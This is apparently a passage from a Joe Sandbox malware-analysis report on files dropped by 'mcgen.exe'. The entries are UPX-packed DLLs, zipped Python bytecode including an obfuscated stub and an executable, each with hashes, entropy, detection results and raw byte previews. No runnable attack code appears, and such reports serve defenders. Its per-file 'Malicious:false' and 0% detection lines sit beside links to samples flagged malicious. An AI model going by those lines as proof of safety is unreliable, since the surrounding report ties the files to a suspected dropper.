                                                                                                                                                                                                                                                                  SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                                                  SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: AimStar.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: DChOtFdp9T.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: user.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: HX Design.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: YgJ5inWPQO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: wp-cent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: wp-cent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: WTvNL75dCr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):51192
                                                                                                                                                                                                                                                                  Entropy (8bit):7.762871670400831
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:fTvumeSe2uD4e4elA5woMImLVQhyUzR9AfIIoT:LvxeSeVd4elAqImLVQLX
                                                                                                                                                                                                                                                                  MD5:E1B31198135E45800ED416BD05F8362E
                                                                                                                                                                                                                                                                  SHA1:3F5114446E69F4334FA8CDA9CDA5A6081BCA29ED
                                                                                                                                                                                                                                                                  SHA-256:43F812A27AF7E3C6876DB1005E0F4FB04DB6AF83A389E5F00B3F25A66F26EB80
                                                                                                                                                                                                                                                                  SHA-512:6709C58592E89905263894A99DC1D6AAFFF96ACE930BB35ABFF1270A936C04D3B5F51A70FB5ED03A6449B28CAD70551F3DCCFDD59F9012B82C060E0668D31733
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4@..4@..4@..L...4@..A..4@....4@..C..4@..D..4@..E..4@.v.A..4@..A..4@..4A.4@.v.M..4@.v.@..4@.v....4@.v.B..4@.Rich.4@.................PE..d....WOg.........." ...*.............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):65016
                                                                                                                                                                                                                                                                  Entropy (8bit):7.844438023002735
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:sgnr/ptw33m0QDInUz2fH3JrlFCFfLaImyP7TyUzR9zfIP0:fnrhtoW0QSu+EFfWImyP7UM
                                                                                                                                                                                                                                                                  MD5:B6262F9FBDCA0FE77E96A9EED25E312F
                                                                                                                                                                                                                                                                  SHA1:6BFB59BE5185CEACA311F7D9EF750A12B971CBD7
                                                                                                                                                                                                                                                                  SHA-256:1C0F9C3BDC53C2B24D5480858377883A002EB2EBB57769D30649868BFB191998
                                                                                                                                                                                                                                                                  SHA-512:768321758FC78E398A1B60D9D0AC6B7DFD7FD429EF138845461389AAA8E74468E4BC337C1DB829BA811CB58CC48CFFF5C8DE325DE949DDE6D89470342B2C8CE8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.Z.|.4.|.4.|.4.u...z.4.m.5.~.4.m.7.x.4.m.0.t.4.m.1.p.4...5.~.4..x0.}.4..x5.z.4...5...4.|.5...4...9.z.4...4.}.4....}.4...6.}.4.Rich|.4.........PE..d....WOg.........." ...*.............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):122088
                                                                                                                                                                                                                                                                  Entropy (8bit):7.904008472378221
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:B3UVX099NzjRjBmFTSki6cbA8VDEcZJDY/LB7cMvVPcc1di9ImvqxEMmTyUzR98K:B3UWVzVjp6cb+SqOMtPc9ImvqxExn
                                                                                                                                                                                                                                                                  MD5:9CFB6D9624033002BC19435BAE7FF838
                                                                                                                                                                                                                                                                  SHA1:D5EECC3778DE943873B33C83432323E2B7C2E5C2
                                                                                                                                                                                                                                                                  SHA-256:41B0B60FE2AA2B63C93D3CE9AB69247D440738EDB4805F18DB3D1DAA6BB3EBFF
                                                                                                                                                                                                                                                                  SHA-512:DD6D7631A54CBD4ABD58B0C5A8CB5A10A468E87019122554467FD1D0669B9A270650928D9DE94A7EC059D4ACEBF39FD1CFCEA482FC5B3688E7924AAF1369CC64
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\lUT..;...;...;..u....;...:...;...8...;...?...;...>...;...:...;.j.:...;...:...;...8...;...6...;...;...;.......;...9...;.Rich..;.........................PE..d....WOg.........." ...*.....0.......p....................................................`......................................................................+..........\........................................|..@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):37368
                                                                                                                                                                                                                                                                  Entropy (8bit):7.62885373795624
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:WzzaDWoin9vvSfhb8pnTImvI9qJyUFRYT2Ip4ygCxf1mlzzF:WzOW6JQTImvI9WyUzR9yRfIPF
                                                                                                                                                                                                                                                                  MD5:0B214888FAC908AD036B84E5674539E2
                                                                                                                                                                                                                                                                  SHA1:4079B274EC8699A216C0962AFD2B5137809E9230
                                                                                                                                                                                                                                                                  SHA-256:A9F24AD79A3D2A71B07F93CD56FC71958109F0D1B79EEBF703C9ED3AC76525FF
                                                                                                                                                                                                                                                                  SHA-512:AE7AEE8A11248F115EB870C403DF6FC33785C27962D8593633069C5FF079833E76A74851EF51067CE302B8EA610F9D95C14BE5E62228EBD93570C2379A2D4846
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.A..............K.............................................x.........................................'.............Rich............PE..d....WOg.........." ...*.P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):89592
                                                                                                                                                                                                                                                                  Entropy (8bit):7.901406061659478
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:+E29OZvi4bwTlI+rWNp+UavNhym9PcIbiQZWL22eMBYqj8uyDM/2Im01rqyUzR9u:+MviSJj+JymBBBZIheEjMoOIm01rtWO
                                                                                                                                                                                                                                                                  MD5:ADEAA96A07B7B595675D9F351BB7A10C
                                                                                                                                                                                                                                                                  SHA1:484A974913276D236CB0D5DB669358E215F7FCED
                                                                                                                                                                                                                                                                  SHA-256:3E749F5FAD4088A83AE3959825DA82F91C44478B4EB74F92387FF50FF1B8647D
                                                                                                                                                                                                                                                                  SHA-512:5D01D85CDA1597A00B39746506FF1F0F01EEEA1DC2A359FCECC8EE40333613F7040AB6D643FDAEE6ADAA743D869569B9AB28AE56A32199178681F8BA4DEA4E55
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..C~...~...~...w.?.z...o3..|...o3..}...o3..v...o3..r....3..}....4..|...~........3..D....3.......3S......3......Rich~...........PE..d....WOg.........." ...*. .......p........................................................`.........................................4...L....................0.........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):29552
                                                                                                                                                                                                                                                                  Entropy (8bit):7.411884404531348
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:3e8XPAVnB8JpeEIm9UtEJyUFRYT2Ip4mTxf1mlBqsovFfY:TgB8CEIm9Ut4yUzR9GfIQsotfY
                                                                                                                                                                                                                                                                  MD5:766820215F82330F67E248F21668F0B3
                                                                                                                                                                                                                                                                  SHA1:5016E869D7F65297F73807EBDAF5BA69B93D82BD
                                                                                                                                                                                                                                                                  SHA-256:EF361936929B70EF85E070ED89E55CBDA7837441ACAFEEA7EF7A0BB66ADDEEC6
                                                                                                                                                                                                                                                                  SHA-512:4911B935E39D317630515E9884E6770E3C3CDBD32378B5D4C88AF22166B79B8EFC21DB501F4FFB80668751969154683AF379A6806B9CD0C488E322BD00C87D0E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.............s......m.......m.......m.......m......{m.......j..............{m......{m......{m......{m......Rich............PE..d....WOg.........." ...*.0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):46584
                                                                                                                                                                                                                                                                  Entropy (8bit):7.708630278879131
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:pOVO07RbhED2LEIuo4OCYkbaEts+Z85iEsaAEwAptjvImywAmmJyUFRYT2Ip4Ep5:GPkD2LEIuo4E5CpZEbjvImywAmKyUzRs
                                                                                                                                                                                                                                                                  MD5:65CD246A4B67CC1EAB796E2572C50295
                                                                                                                                                                                                                                                                  SHA1:053FA69B725F1789C87D0EF30F3D8997D7E97E32
                                                                                                                                                                                                                                                                  SHA-256:4ECD63F5F111D97C2834000FF5605FAC61F544E949A0D470AAA467ABC10B549C
                                                                                                                                                                                                                                                                  SHA-512:C5BF499CC3038741D04D8B580B54C3B8B919C992366E4F37C1AF6321A7C984B2E2251C5B2BC8626AFF3D6CA3BF49D6E1CCD803BD99589F41A40F24EC0411DB86
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c..\..}\..}\..}UzR}Z..}M..|^..}M..|_..}M..|T..}M..|Q..}..|^..}\..}...}...|U..}..|]..}..|]..}.>}]..}..|]..}Rich\..}........PE..d....WOg.........." ...*.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):61432
                                                                                                                                                                                                                                                                  Entropy (8bit):7.832464272741381
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:6Ze1bxjT8JFeEl4m6MisPI9eATFaImvQgNyUzR9+fIP2:6AbFT8JcEem65sw9eSgImvQgtu
                                                                                                                                                                                                                                                                  MD5:F018B2C125AA1ECC120F80180402B90B
                                                                                                                                                                                                                                                                  SHA1:CF2078A591F0F45418BAB7391C6D05275690C401
                                                                                                                                                                                                                                                                  SHA-256:67A887D3E45C8836F8466DC32B1BB8D64C438F24914F9410BC52B02003712443
                                                                                                                                                                                                                                                                  SHA-512:C57580AF43BC1243C181D9E1EFBC4AA544DB38650C64F8ECE42FBCBE3B4394FCADB7ACFB83E27FBE4448113DB1E6AF8D894FB4BD708C460CF45C6524FCFDEF96
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95..95..95..A...95...4..95.....95...6..95...1..95...0..95.1.4..95..4..95..94..85.1.8..95.1.5..95.1...95.1.7..95.Rich.95.................PE..d....WOg.........." ...*............`-.......................................P............`..........................................K..P....I.......@.......................K......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):70512
                                                                                                                                                                                                                                                                  Entropy (8bit):7.839717554547019
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:iDX4m2+uSKd7nh+5qr2UmGPijcXvyOVBbUImL7bJ7yUzR9UfI+vbGVx:KRud7E3U0cXJ/AImL7b/1Vx
                                                                                                                                                                                                                                                                  MD5:309B1A7156EBD03474B44F11BA363E89
                                                                                                                                                                                                                                                                  SHA1:8C09F8C65CAC5BB1FCF43AF65A7B3E59A9400990
                                                                                                                                                                                                                                                                  SHA-256:67ED13570C5376CD4368EA1E4C762183629537F13504DB59D1D561385111FE0A
                                                                                                                                                                                                                                                                  SHA-512:E610A92F0E4FA2A6CD9AFD7D8D7A32CC5DF14E99AF689BFB5A4B0811DCA97114BF3FCF4BFAE68600ED2417D18EE88C64C22B0C186068AFD4731BE1DE90C06F15
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.^.............~!.....................................-...................4..........-.......-.......-.M.....-.......Rich............PE..d....WOg.........." ...*.........@.......P...................................0............`.........................................l,..d....)....... ..........t............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1396821
                                                                                                                                                                                                                                                                  Entropy (8bit):5.531015514770172
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:0W7WpzO6etYzGNcT1pz3YQfiBgDPtLwjFx278SAZQYF93BGfL+DuWFnjVpdxhYVd:l7WpzZSeT1xTYF9f5pdxhYVP05WdZ7
                                                                                                                                                                                                                                                                  MD5:18C3F8BF07B4764D340DF1D612D28FAD
                                                                                                                                                                                                                                                                  SHA1:FC0E09078527C13597C37DBEA39551F72BBE9AE8
                                                                                                                                                                                                                                                                  SHA-256:6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
                                                                                                                                                                                                                                                                  SHA-512:135B97CD0284424A269C964ED95B06D338814E5E7B2271B065E5EABF56A8AF4A213D863DD2A1E93C1425FADB1B20E6C63FFA6E8984156928BE4A9A2FBBFD5E93
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PK..........!.+.P............._collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):119949
                                                                                                                                                                                                                                                                  Entropy (8bit):7.685951389978537
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:RTNU1UmtZ9b+aHoCMl66/Yngmy2hFrcGPm7tFbPPT:JmhZ9b+aHag6/9mz2tLPT
                                                                                                                                                                                                                                                                  MD5:3D5FCDF08652A5B600AC384DE84425FE
                                                                                                                                                                                                                                                                  SHA1:4B2407E36997D9FDA2A47C4732ABAECF4F54A14A
                                                                                                                                                                                                                                                                  SHA-256:F22B36D9124E8287B7242C565418917179AB9C078D60B0D2BDD7487664E1DAD4
                                                                                                                                                                                                                                                                  SHA-512:EF4D745F3E49463934BE0D6C21565C7EAA20950743241128B6EECC140205BB0D7396C1AEAD8E64E5E0DE8393575FDAD4C33464D9DF7038321FBCF25EB8FB286D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PK..........!Z .............stub-o.pyc..........ugz1.............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1630488
                                                                                                                                                                                                                                                                  Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                                                                  MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                                                                  SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                                                                  SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                                                                  SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):29968
                                                                                                                                                                                                                                                                  Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                                                  MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                                                  SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                                                  SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                                                  SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):227096
                                                                                                                                                                                                                                                                  Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                                                  MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                                                  SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                                                  SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                                                  SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1850360
                                                                                                                                                                                                                                                                  Entropy (8bit):7.9939340697016155
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:49152:VfOZocB9lcRar86XqS2fUbe1F6lRiPp3UdwT6m5FmZ9UTCO:VYB9GRag6kfQe1kyx3UdzscZk
                                                                                                                                                                                                                                                                  MD5:9A3D3AE5745A79D276B05A85AEA02549
                                                                                                                                                                                                                                                                  SHA1:A5E60CAC2CA606DF4F7646D052A9C0EA813E7636
                                                                                                                                                                                                                                                                  SHA-256:09693BAB682495B01DE8A24C435CA5900E11D2D0F4F0807DAE278B3A94770889
                                                                                                                                                                                                                                                                  SHA-512:46840B820EE3C0FA511596124EB364DA993EC7AE1670843A15AFD40AC63F2C61846434BE84D191BD53F7F5F4E17FAD549795822BB2B9C792AC22A1C26E5ADF69
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.r.'.!.'.!.'.!.. .'.!.z!.'.!.. .'.!.. .'.!.. .'.!._.!.'.!... .'.!.'.!N&.!F.. -'.!F.. .'.!F.x!.'.!F.. .'.!Rich.'.!........PE..d....WOg.........." ...*.0.......0J..]e..@J..................................Pf...........`.........................................H.e......ye......pe......P]..............Gf.,............................je.(...Pje.@...........................................UPX0.....0J.............................UPX1.....0...@J..,..................@....rsrc........pe......0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):630736
                                                                                                                                                                                                                                                                  Entropy (8bit):6.409476333013752
